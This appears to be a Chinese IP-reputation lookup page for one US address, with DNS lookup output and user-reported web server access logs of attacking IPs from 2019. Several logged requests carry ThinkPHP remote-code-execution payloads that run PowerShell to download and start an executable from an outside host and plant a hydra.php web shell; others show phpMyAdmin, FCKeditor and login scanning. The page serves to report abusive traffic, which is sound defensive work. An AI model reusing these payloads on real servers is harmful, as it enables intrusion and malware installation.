必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America (the)

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 104.61.33.74
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7593
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;104.61.33.74.			IN	A

;; AUTHORITY SECTION:
.			203	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2023112203 1800 900 604800 86400

;; Query time: 21 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Nov 23 10:15:41 CST 2023
;; MSG SIZE  rcvd: 105
HOST信息:
74.33.61.104.in-addr.arpa domain name pointer 104-61-33-74.lightspeed.rcsntx.sbcglobal.net.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
74.33.61.104.in-addr.arpa	name = 104-61-33-74.lightspeed.rcsntx.sbcglobal.net.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
118.25.71.65 attack
攻击型IP
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-03-31 17:58:18
203.208.60.29 bots
没想到谷歌中国的IP和海外的ip还不一样,海外的是66.249.*.*
2019-04-04 08:02:54
103.119.45.80 attack
攻击IP
103.119.45.80 - - [31/Mar/2019:21:06:23 +0800] "GET /MyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
103.119.45.80 - - [31/Mar/2019:21:06:23 +0800] "GET /phpMyAdmin1/index.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
103.119.45.80 - - [31/Mar/2019:21:06:23 +0800] "GET /phpMyAdmin123/index.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
2019-03-31 21:17:36
118.25.145.186 attack
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-08 16:47:25
58.218.56.113 attack
58.218.56.113 - - [02/Apr/2019:07:40:20 +0800] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
58.218.56.113 - - [02/Apr/2019:07:40:20 +0800] "GET /web/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 404 505 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
58.218.56.113 - - [02/Apr/2019:07:40:21 +0800] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
58.218.56.113 - - [02/Apr/2019:07:40:21 +0800] "GET /web/editor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 404 502 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
2019-04-02 11:05:01
118.25.49.95 attack
118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 400 682 "http://118.25.52.138:443/struts2-rest-showcase/orders.xhtml" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.action HTTP/1.1" 400 682 "http://118.25.52.138:443/index.action" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.do HTTP/1.1" 400 682 "http://118.25.52.138:443/index.do" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-01 11:50:45
185.53.91.24 bots
185.53.91.24 - - [06/Apr/2019:07:13:10 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 404 209 "-" "python-requests/2.21.0"
185.53.91.24 - - [06/Apr/2019:07:13:12 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 301 194 "-" "python-requests/2.21.0"
185.53.91.24 - - [06/Apr/2019:07:13:14 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 404 209 "-" "python-requests/2.21.0"
2019-04-06 07:34:25
37.115.184.170 spam
37.115.184.170 - - [02/Apr/2019:09:49:36 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
37.115.184.170 - - [02/Apr/2019:09:49:36 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
37.115.184.170 - - [02/Apr/2019:09:49:37 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
2019-04-02 09:53:50
58.251.121.184 attack
58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.185 - - [01/Apr/2019:07:47:17 +0800] "GET /db_cts.php HTTP/1.1" 404 209 "http://118.25.52.138/db_cts.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 404 209 "http://118.25.52.138/ljb.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-01 08:05:15
58.251.121.186 attack
58.251.121.186 - - [01/Apr/2019:12:08:47 +0800] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.186 - - [01/Apr/2019:12:08:47 +0800] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/phpMyAdmin/phpMyAdmin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-01 12:11:03
120.131.10.157 attack
120.131.10.157 - - [09/Apr/2019:04:15:09 +0800] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 10484 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
2019-04-09 04:15:48
61.174.53.3 attack
61.174.53.3 - - [04/Apr/2019:14:03:05 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu"
61.174.53.3 - - [04/Apr/2019:14:03:05 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
2019-04-04 14:07:14
1.20.100.97 attack
1.20.100.97 - - [08/Apr/2019:08:27:17 +0800] "POST https://www.eznewstoday.com/wp-login.php HTTP/1.1" 200 5534 "https://www.eznewstoday.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.54.17) Gecko/20166441 Firefox/52.54.17"
2019-04-08 08:28:11
115.87.27.91 attack
115.87.27.91 - - [04/Apr/2019:18:44:53 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"
2019-04-04 18:46:39
123.190.159.103 attack
垃圾IP攻击型
123.190.159.103 - - [31/Mar/2019:21:47:14 +0800] "GET /otsmobile/app/mds/mgw.htm HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
2019-03-31 21:50:23

最近上报的IP列表

104.61.249.164 104.61.229.212 104.61.214.235 104.61.198.214
104.61.73.152 104.61.84.158 104.61.29.80 104.61.66.29
104.61.88.130 104.61.39.3 104.61.86.6 104.61.82.60
104.61.65.96 104.62.115.246 104.61.148.58 104.61.72.72
104.62.137.217 104.61.83.82 104.62.129.147 104.62.131.12